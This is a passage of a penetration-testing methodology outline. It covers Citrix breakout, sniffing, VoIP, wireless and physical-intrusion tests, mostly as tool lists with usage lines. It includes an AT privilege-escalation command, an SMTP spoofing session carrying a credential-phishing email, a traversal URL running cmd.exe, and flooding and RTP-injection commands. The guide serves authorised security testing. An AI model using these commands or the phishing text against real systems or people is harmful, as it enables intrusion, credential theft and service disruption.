21.4.3.4. AT Command - priviledge escalation

21.4.3.4.1. AT HH:MM /interactive "cmd.exe"

21.4.3.4.2. AT HH:MM /interactive %comspec% /k

21.4.3.4.3. Untitled

21.4.3.5. Keyboard Shortcuts/ Hotkeys

21.4.3.5.1. Ctrl + h – View History

21.4.3.5.2. Ctrl + n – New Browser

21.4.3.5.3. Shift + Left Click – New Browser

21.4.3.5.4. Ctrl + o – Internet Address (browse feature)

21.4.3.5.5. Ctrl + p – Print (to file)

21.4.3.5.6. Right Click (Shift + F10)

21.4.3.5.7. F1 – Jump to URL

21.4.3.5.8. SHIFT+F1: Local Task List

21.4.3.5.9. SHIFT+F2: Toggle Title Bar

21.4.3.5.10. SHIFT+F3: Close Remote Application

21.4.3.5.11. CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del

21.4.3.5.12. CTRL+F2: Remote Task List

21.4.3.5.13. CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC

21.4.3.5.14. ALT+F2: Cycle through programs

21.4.3.5.15. ALT+PLUS: Alt+TAB

21.4.3.5.16. ALT+MINUS: ALT+SHIFT+TAB

21.5. Brute Force

21.5.1. bforce.js

21.5.1.1. bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2

21.5.1.2. bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt

21.5.1.3. Untitled

21.6. Review Configuration Files

21.6.1. Application server configuration file

21.6.1.1. appsrv.ini

21.6.1.1.1. Location

21.6.1.1.2. World writeable

21.6.1.1.3. Review other files

21.6.1.1.4. Sample file

21.6.2. Program Neighborhood configuration file

21.6.2.1. pn.ini

21.6.2.1.1. Location

21.6.2.1.2. Review other files

21.6.2.1.3. Sample file

21.6.3. Citrix ICA client configuration file

21.6.3.1. wfclient.ini

21.6.3.1.1. Location

21.7. References

21.7.1. Vulnerabilities

21.7.1.1. Art of Hacking

21.7.1.2. Common Vulnerabilities and Exploits (CVE)

21.7.1.2.1. Sample file

21.7.1.2.2. Untitled

21.7.1.2.3. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=citrix

21.7.1.3. OSVDB

21.7.1.3.1. http://osvdb.org/search/search?search[vuln_title]=Citrix&search[text_type]=titles&search[s_date]=&search[e_date]=&search[refid]=&search[referencetypes]=&search[vendors]=&kthx=searchSecunia

21.7.1.4. Secunia

21.7.1.5. Security-database.com

21.7.1.5.1. http://www.security-database.com/cgi-bin/search-sd.cgi?q=Citrix

21.7.1.6. SecurityFocus

21.7.2. Support

21.7.2.1. Citrix

21.7.2.1.1. Knowledge Base

21.7.2.2. Thinworld

21.7.3. Exploits

21.7.3.1. Milw0rm

21.7.3.1.1. http://www.milw0rm.com/search.php

21.7.3.2. Art of Hacking

21.7.3.2.1. Citrix

21.7.4. Tools Resource

21.7.4.1. Zip file containing the majority of tools mentioned in this article into a zip file for easy download/ access

22. Network Backbone

22.1. Generic Toolset

22.1.1. Wireshark (Formerly Ethereal)

22.1.1.1. Passive Sniffing

22.1.1.1.1. Usernames/Passwords

22.1.1.1.2. Email

22.1.1.1.3. FTP

22.1.1.1.4. HTTP

22.1.1.1.5. HTTPS

22.1.1.1.6. RDP

22.1.1.1.7. VOIP

22.1.1.1.8. Other

22.1.1.2. Filters

22.1.1.2.1. ip.src == ip_address

22.1.1.2.2. ip.dst == ip_address

22.1.1.2.3. tcp.dstport == port_no.

22.1.1.2.4. ! ip.addr == ip_address

22.1.1.2.5. (ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)

22.1.2. Cain & Abel

22.1.2.1. Active Sniffing

22.1.2.1.1. ARP Cache Poisoning

22.1.2.1.2. DNS Poisoning

22.1.2.1.3. Routing Protocols

22.1.3. Cisco-Torch

22.1.3.1. ./cisco-torch.pl <options> <IP,hostname,network> or ./cisco-torch.pl <options> -F <hostlist>

22.1.4. NTP-Fingerprint

22.1.4.1. perl ntp-fingerprint.pl -t [ip_address]

22.1.5. Yersinia

22.1.6. p0f

22.1.6.1. ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]

22.1.7. Manual Check (Credentials required)

22.1.8. MAC Spoofing

22.1.8.1. mac address changer for windows

22.1.8.2. macchanger

22.1.8.2.1. Random Mac Address:- macchanger -r eth0

22.1.8.3. madmacs

22.1.8.4. smac

22.1.8.5. TMAC

23. Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that if used could lead to privilege escalation or denial of service against the computer system that is being attacked. Exploits can be compiled and used manually or various engines exist that are essentially at the lowest level pre-compiled point and shoot tools. These engines do also have a number of other extra underlying features for more advanced users.

23.1. Password Attacks

23.1.1. Known Accounts

23.1.1.1. Identified Passwords

23.1.1.2. Unidentified Hashes

23.1.2. Default Accounts

23.1.2.1. Identified Passwords

23.1.2.2. Unidentified Hashes

23.2. Exploits

23.2.1. Successful Exploits

23.2.1.1. Accounts

23.2.1.1.1. Passwords

23.2.1.1.2. Groups

23.2.1.1.3. Other Details

23.2.1.2. Services

23.2.1.3. Backdoor

23.2.1.4. Connectivity

23.2.2. Unsuccessful Exploits

23.2.3. Resources

23.2.3.1. Securiteam

23.2.3.1.1. Exploits are sorted by year and must be downloaded individually

23.2.3.2. SecurityForest

23.2.3.2.1. Updated via CVS after initial install

23.2.3.3. GovernmentSecurity

23.2.3.3.1. Need to create and account to obtain access

23.2.3.4. Red Base Security

23.2.3.4.1. Oracle Exploit site only

23.2.3.5. Wireless Vulnerabilities & Exploits (WVE)

23.2.3.5.1. Wireless Exploit Site

23.2.3.6. PacketStorm Security

23.2.3.6.1. Exploits downloadable by month and year but no indexing carried out.

23.2.3.7. SecWatch

23.2.3.7.1. Exploits sorted by year and month, download seperately

23.2.3.8. SecurityFocus

23.2.3.8.1. Exploits must be downloaded individually

23.2.3.9. Metasploit

23.2.3.9.1. Install and regualrly update via svn

23.2.3.10. Milw0rm

23.2.3.10.1. Exploit archived indexed and sorted by port download as a whole - The one to go for!

23.3. Tools

23.3.1. Metasploit

23.3.1.1. Free Extra Modules

23.3.1.1.1. local copy

23.3.2. Manual SQL Injection

23.3.2.1. Understanding SQL Injection

23.3.2.2. SQL Injection walkthrough

23.3.2.3. SQL Injection by example

23.3.2.4. Blind SQL Injection

23.3.2.5. Advanced SQL Injection in SQL Server

23.3.2.6. More Advanced SQL Injection

23.3.2.7. Advanced SQL Injection in Oracle databases

23.3.2.8. SQL Cheatsheets

23.3.2.8.1. Untitled

23.3.3. SQL Power Injector

23.3.4. SecurityForest

23.3.5. SPI Dynamics WebInspect

23.3.6. Core Impact

23.3.7. Cisco Global Exploiter

23.3.8. PIXDos

23.3.8.1. perl PIXdos.pl [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=M AC] [--destmac=MAC] [--port=n]

23.3.9. CANVAS

23.3.10. Inguma

24. Server Specific Tests

24.1. Databases

24.1.1. Direct Access Interrogation

24.1.1.1. MS SQL Server

24.1.1.1.1. Ports

24.1.1.1.2. Version

24.1.1.1.3. osql

24.1.1.2. Oracle

24.1.1.2.1. Ports

24.1.1.2.2. TNS Listener

24.1.1.2.3. SQL Plus

24.1.1.2.4. Default Account/Passwords

24.1.1.2.5. Default SID's

24.1.1.3. MySQL

24.1.1.3.1. Ports

24.1.1.3.2. Version

24.1.1.3.3. Users/Passwords

24.1.1.4. DB2

24.1.1.5. Informix

24.1.1.6. Sybase

24.1.1.7. Other

24.1.2. Scans

24.1.2.1. Default Ports

24.1.2.2. Non-Default Ports

24.1.2.3. Instance Names

24.1.2.4. Versions

24.1.3. Password Attacks

24.1.3.1. Sniffed Passwords

24.1.3.1.1. Cracked Passwords

24.1.3.1.2. Hashes

24.1.3.2. Direct Access Guesses

24.1.4. Vulnerability Assessment

24.1.4.1. Automated

24.1.4.1.1. Reports

24.1.4.1.2. Vulnerabilities

24.1.4.2. Manual

24.1.4.2.1. Patch Levels

24.1.4.2.2. Confirmed Vulnerabilities

24.2. Mail

24.2.1. Scans

24.2.2. Fingerprint

24.2.2.1. Manual

24.2.2.2. Automated

24.2.3. Spoofable

24.2.3.1. Telnet spoof

24.2.3.1.1. telnet target_IP 25helo target.commail from: [email protected] to: [email protected]: [email protected]: [192.168.1.1]X-Originating-Email: [[email protected]]MIME-Version: 1.0To: <[email protected]>From: < [email protected] >Subject: Important! Account check requiredContent-Type: text/htmlContent-Transfer-Encoding: 7bitDear Valued Customer,The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.Please go to the following website and log in with your account details. <a href=http://192.168.1.108/hacme.html>www.target.com/login</a>Online Security Manager.Target [email protected]

24.2.4. Relays

24.3. VPN

24.3.1. Scanning

24.3.1.1. 500 UDP IPSEC

24.3.1.2. 1723 TCP PPTP

24.3.1.3. 443 TCP/SSL

24.3.1.4. nmap -sU -PN -p 500 80.75.68.22-27

24.3.1.5. ipsecscan 80.75.68.22 80.75.68.27

24.3.2. Fingerprinting

24.3.2.1. ike-scan --showbackoff 80.75.68.22 80.75.68.27

24.3.3. PSK Crack

24.3.3.1. ikeprobe 80.75.68.27

24.3.3.2. sniff for responses with C&A or ikecrack

24.4. Web

24.4.1. Vulnerability Assessment

24.4.1.1. Automated

24.4.1.1.1. Reports

24.4.1.1.2. Vulnerabilities

24.4.1.2. Manual

24.4.1.2.1. Patch Levels

24.4.1.2.2. Confirmed Vulnerabilities

24.4.2. Permissions

24.4.2.1. PUT /test.txt HTTP/1.0

24.4.2.2. CONNECT mail.another.com:25 HTTP/1.0

24.4.2.3. POST http://mail.another.com:25/ HTTP/1.0Content-Type: text/plainContent-Length: 6

24.4.3. Scans

24.4.4. Fingerprinting

24.4.4.1. Other

24.4.4.2. HTTP

24.4.4.2.1. Commands

24.4.4.2.2. Modules

24.4.4.2.3. File Extensions

24.4.4.3. HTTPS

24.4.4.3.1. Commands

24.4.4.3.2. Commands

24.4.4.3.3. File Extensions

24.4.5. Directory Traversal

24.4.5.1. http://www.target.com/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

25. VoIP Security

25.1. Sniffing Tools

25.1.1. AuthTool

25.1.2. Cain & Abel

25.1.3. Etherpeek

25.1.4. NetDude

25.1.5. Oreka

25.1.6. PSIPDump

25.1.7. SIPomatic

25.1.8. SIPv6 Analyzer

25.1.9. UCSniff

25.1.10. VoiPong

25.1.11. VOMIT

25.1.12. Wireshark

25.1.13. WIST - Web Interface for SIP Trace

25.2. Scanning and Enumeration Tools

25.2.1. enumIAX

25.2.2. fping

25.2.3. IAX Enumerator

25.2.4. iWar

25.2.5. Nessus

25.2.6. Nmap

25.2.7. SIP Forum Test Framework (SFTF)

25.2.8. SIPcrack

25.2.9. sipflanker

25.2.9.1. python sipflanker.py 192.168.1-254

25.2.10. SIP-Scan

25.2.11. SIP.Tastic

25.2.12. SIPVicious

25.2.13. SiVuS

25.2.14. SMAP

25.2.14.1. smap IP_Address/Subnet_Mask

25.2.14.2. smap -o IP_Address/Subnet_Mask

25.2.14.3. smap -l IP_Address

25.2.15. snmpwalk

25.2.16. VLANping

25.2.17. VoIPAudit

25.2.18. VoIP GHDB Entries

25.2.19. VoIP Voicemail Database

25.3. Packet Creation and Flooding Tools

25.3.1. H.323 Injection Files

25.3.2. H225regreject

25.3.3. IAXHangup

25.3.4. IAXAuthJack

25.3.5. IAX.Brute

25.3.6. IAXFlooder

25.3.6.1. ./iaxflood sourcename destinationname numpackets

25.3.7. INVITE Flooder

25.3.7.1. ./inviteflood interface target_user target_domain ip_address_target no_of_packets

25.3.8. kphone-ddos

25.3.9. RTP Flooder

25.3.10. rtpbreak

25.3.11. Scapy

25.3.12. Seagull

25.3.13. SIPBomber

25.3.14. SIPNess

25.3.15. SIPp

25.3.16. SIPsak

25.3.16.1. Tracing paths: - sipsak -T -s sip:[email protected]

25.3.16.2. Options request:- sipsak -vv -s sip:[email protected]main

25.3.16.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:[email protected]

25.3.17. SIP-Send-Fun

25.3.18. SIPVicious

25.3.19. Spitter

25.3.20. TFTP Brute Force

25.3.20.1. perl tftpbrute.pl <tftpserver> <filelist> <maxprocesses>

25.3.21. UDP Flooder

25.3.21.1. ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets

25.3.22. UDP Flooder (with VLAN Support)

25.3.22.1. ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets

25.3.23. Voiphopper

25.4. Fuzzing Tools

25.4.1. Asteroid

25.4.2. Codenomicon VoIP Fuzzers

25.4.3. Fuzzy Packet

25.4.4. Mu Security VoIP Fuzzing Platform

25.4.5. ohrwurm RTP Fuzzer

25.4.6. PROTOS H.323 Fuzzer

25.4.7. PROTOS SIP Fuzzer

25.4.8. SIP Forum Test Framework (SFTF)

25.4.9. Sip-Proxy

25.4.10. Spirent ThreatEx

25.5. Signaling Manipulation Tools

25.5.1. AuthTool

25.5.1.1. ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v

25.5.2. BYE Teardown

25.5.3. Check Sync Phone Rebooter

25.5.4. RedirectPoison

25.5.4.1. ./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:100.77.50.52;line=xtrfgy>"

25.5.5. Registration Adder

25.5.6. Registration Eraser

25.5.7. Registration Hijacker

25.5.8. SIP-Kill

25.5.9. SIP-Proxy-Kill

25.5.10. SIP-RedirectRTP

25.5.11. SipRogue

25.5.12. vnak

25.6. Media Manipulation Tools

25.6.1. RTP InsertSound

25.6.1.1. ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

25.6.2. RTP MixSound

25.6.2.1. ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

25.6.3. RTPProxy

25.6.4. RTPInject

25.7. Generic Software Suites

25.7.1. OAT Office Communication Server Tool Assessment

25.7.2. EnableSecurity VOIPPACK

25.7.2.1. Note: - Add-on for Immunity Canvas

25.8. References

25.8.1. URL's

25.8.1.1. Common Vulnerabilities and Exploits (CVE)

25.8.1.1.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=voip

25.8.1.2. Default Passwords

25.8.1.3. Hacking Exposed VoIP

25.8.1.3.1. Tool Pre-requisites

25.8.1.4. VoIPsa

25.8.2. White Papers

25.8.2.1. An Analysis of Security Threats and Tools in SIP-Based VoIP Systems

25.8.2.2. An Analysis of VoIP Security Threats and Tools

25.8.2.3. Hacking VoIP Exposed

25.8.2.4. Security testing of SIP implementations

25.8.2.5. SIP Stack Fingerprinting and Stack Difference Attacks

25.8.2.6. Two attacks against VoIP

25.8.2.7. VoIP Attacks!

25.8.2.8. VoIP Security Audit Program (VSAP)

26. Wireless Penetration

26.1. Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out your wireless assessment. All this information is needed to give the tester, (and hence, the customer), a clear and concise picture of the network you are assessing. A brief overview of the network during a pre-site meeting weith the customer should allow you to estimate the timescales required to carry the assessment out.

26.1.1. Site Map

26.1.1.1. RF Map

26.1.1.1.1. Lines of Sight

26.1.1.1.2. Signal Coverage

26.1.1.2. Physical Map

26.1.1.2.1. Triangulate APs

26.1.1.2.2. Satellite Imagery

26.1.2. Network Map

26.1.2.1. MAC Filter

26.1.2.1.1. Authorised MAC Addresses

26.1.2.1.2. Reaction to Spoofed MAC Addresses

26.1.2.2. Encryption Keys utilised

26.1.2.2.1. WEP

26.1.2.2.2. WPA/PSK

26.1.2.2.3. 802.1x

26.1.2.3. Access Points

26.1.2.3.1. ESSID

26.1.2.3.2. BSSIDs

26.1.2.4. Wireless Clients

26.1.2.4.1. MAC Addresses

26.1.2.4.2. Intercepted Traffic

26.2. Wireless Toolkit

26.2.1. Wireless Discovery

26.2.1.1. Aerosol

26.2.1.2. Airfart

26.2.1.3. Aphopper

26.2.1.4. Apradar

26.2.1.5. BAFFLE

26.2.1.6. inSSIDer

26.2.1.7. iWEPPro

26.2.1.8. karma

26.2.1.9. KisMAC-ng

26.2.1.10. Kismet

26.2.1.11. MiniStumbler

26.2.1.12. Netstumbler

26.2.1.13. Vistumbler

26.2.1.14. Wellenreiter

26.2.1.15. Wifi Hopper

26.2.1.16. WirelessMon

26.2.1.17. WiFiFoFum

26.2.2. Packet Capture

26.2.2.1. Airopeek

26.2.2.2. Airpcap

26.2.2.3. Airtraf

26.2.2.4. Apsniff

26.2.2.5. Cain

26.2.2.6. Commview

26.2.2.7. Ettercap

26.2.2.8. Netmon

26.2.2.8.1. nmwifi

26.2.2.9. Wireshark

26.2.3. EAP Attack tools

26.2.3.1. eapmd5pass

26.2.3.1.1. eapmd5pass -w dictionary_file -r eapmd5-capture.dump

26.2.3.1.2. Untitled

26.2.4. Leap Attack Tools

26.2.4.1. asleap

26.2.4.2. thc leap cracker

26.2.4.3. anwrap

26.2.5. WEP/ WPA Password Attack Tools

26.2.5.1. Airbase

26.2.5.2. Aircrack-ptw

26.2.5.3. Aircrack-ng

26.2.5.4. Airsnort

26.2.5.5. cowpatty

26.2.5.6. FiOS Wireless Key Calculator

26.2.5.7. iWifiHack

26.2.5.8. KisMAC-ng

26.2.5.9. Rainbow Tables

26.2.5.10. wep attack

26.2.5.11. wep crack

26.2.5.12. wzcook

26.2.6. Frame Generation Software

26.2.6.1. Airgobbler

26.2.6.2. airpwn

26.2.6.3. Airsnarf

26.2.6.4. Commview

26.2.6.5. fake ap

26.2.6.6. void 11

26.2.6.7. wifi tap

26.2.6.7.1. wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h]

26.2.6.8. FreeRADIUS - Wireless Pwnage Edition

26.2.7. Mapping Software

26.2.7.1. Online Mapping

26.2.7.1.1. WIGLE

26.2.7.1.2. Skyhook

26.2.7.2. Tools

26.2.7.2.1. Knsgem

26.2.8. File Format Conversion Tools

26.2.8.1. ns1 recovery and conversion tool

26.2.8.2. warbable

26.2.8.3. warkizniz

26.2.8.3.1. warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename]

26.2.8.4. ivstools

26.2.9. IDS Tools

26.2.9.1. WIDZ

26.2.9.2. War Scanner

26.2.9.3. Snort-Wireless

26.2.9.4. AirDefense

26.2.9.5. AirMagnet

26.3. WLAN discovery

26.3.1. Unencrypted WLAN

26.3.1.1. Visible SSID

26.3.1.1.1. Sniff for IP range

26.3.1.2. Hidden SSID

26.3.1.2.1. Deauth client

26.3.2. WEP encrypted WLAN

26.3.2.1. Visible SSID

26.3.2.1.1. WEPattack

26.3.2.2. Hidden SSID

26.3.2.2.1. Deauth client

26.3.3. WPA / WPA2 encrypted WLAN

26.3.3.1. Deauth client

26.3.3.1.1. Capture EAPOL handshake

26.3.4. LEAP encrypted WLAN

26.3.4.1. Deauth client

26.3.4.1.1. Break LEAP

26.3.5. 802.1x WLAN

26.3.5.1. Create Rogue Access Point

26.3.5.1.1. Airsnarf

26.3.5.1.2. fake ap

26.3.5.1.3. Hotspotter

26.3.5.1.4. Karma

26.3.5.1.5. Linux rogue AP

26.3.6. Resources

26.3.6.1. URL's

26.3.6.1.1. Wirelessdefence.org

26.3.6.1.2. Russix

26.3.6.1.3. Wardrive.net

26.3.6.1.4. Wireless Vulnerabilities and Exploits (WVE)

26.3.6.2. White Papers

26.3.6.2.1. Weaknesses in the Key Scheduling Algorithm of RC4

26.3.6.2.2. 802.11b Firmware-Level Attacks

26.3.6.2.3. Wireless Attacks from an Intrusion Detection Perspective

26.3.6.2.4. Implementing a Secure Wireless Network for a Windows Environment

26.3.6.2.5. Breaking 104 bit WEP in less than 60 seconds

26.3.6.2.6. PEAP Shmoocon2008 Wright & Antoniewicz

26.3.6.2.7. Active behavioral fingerprinting of wireless devices

26.3.6.3. Common Vulnerabilities and Exploits (CVE)

26.3.6.3.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wireless

27. Physical Security

27.1. Building Security

27.1.1. Meeting Rooms

27.1.1.1. Check for active network jacks.

27.1.1.2. Check for any information in room.

27.1.2. Lobby

27.1.2.1. Check for active network jacks.

27.1.2.2. Does receptionist/guard leave lobby?

27.1.2.3. Accessbile printers? Print test page.

27.1.2.4. Obtain phone/personnel listing.

27.1.3. Communal Areas

27.1.3.1. Check for active network jacks.

27.1.3.2. Check for any information in room.

27.1.3.3. Listen for employee conversations.

27.1.4. Room Security

27.1.4.1. Resistance of lock to picking.

27.1.4.1.1. What type of locks are used in building? Pin tumblers, padlocks, abinet locks, dimple keys, proximity sensors?

27.1.4.2. Ceiling access areas.

27.1.4.2.1. Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?

27.1.5. Windows

27.1.5.1. Check windows/doors for visible intruderalarm sensors.

27.1.5.2. Check visible areas for sensitive information.

27.1.5.3. Can you video users logging on?

27.2. Perimeter Security

27.2.1. Fence Security

27.2.1.1. Attempt to verify that the whole of the perimeter fence is unbroken.

27.2.2. Exterior Doors

27.2.2.1. If there is no perimeter fence, then determineif exterior doors are secured, guarded andmonitored etc.

27.2.3. Guards

27.2.3.1. Patrol Routines

27.2.3.1.1. Analyse patrol timings to ascertain if any holes exist in the coverage.

27.2.3.2. Communications

27.2.3.2.1. Intercept and analyse guard communications. Determine if the communication methods can be used to aid a physial intrusion.

27.3. Entry Points

27.3.1. Guarded Doors

27.3.1.1. Piggybacking

27.3.1.1.1. Attempt to closely follow employees into thebuilding without having to show valid credentials.

27.3.1.2. Fake ID

27.3.1.2.1. Attempt to use fake ID to gain access.

27.3.1.3. Access Methods

27.3.1.3.1. Test 'out of hours' entry methods

27.3.2. Unguarded Doors

27.3.2.1. Identify all unguardedentry points.

27.3.2.1.1. Are doors secured?

27.3.2.1.2. Check locks for resistance to lock picking.

27.3.3. Windows

27.3.3.1. Check windows/doors for visible intruderalarm sensors.

27.3.3.1.1. Attempt to bypass sensors.

27.4. Office Waste

27.4.1. Dumpster DivingAttempt to retrieve any useful information from ToE refuse. This may include : printed documents, books, manuals, laptops, PDA's, USB memory devices, CD's, Floppy discs etc

28. Final Report - template

29. Contributors

29.1. Matt Byrne (WirelessDefence.org)

29.1.1. Matt contributed the majority of the Wireless section.

29.2. Arvind Doraiswamy (Paladion.net)

29.2.1. Arvind kindly contributed to the associated MySQL section when coming across TCP Port 3306 open.

29.3. Lee Lawson (Dns.co.uk)

29.3.1. Lee contributed the majority of the Cisco and Social Engineering sections.

29.4. Nabil OUCHN (Security-database.com)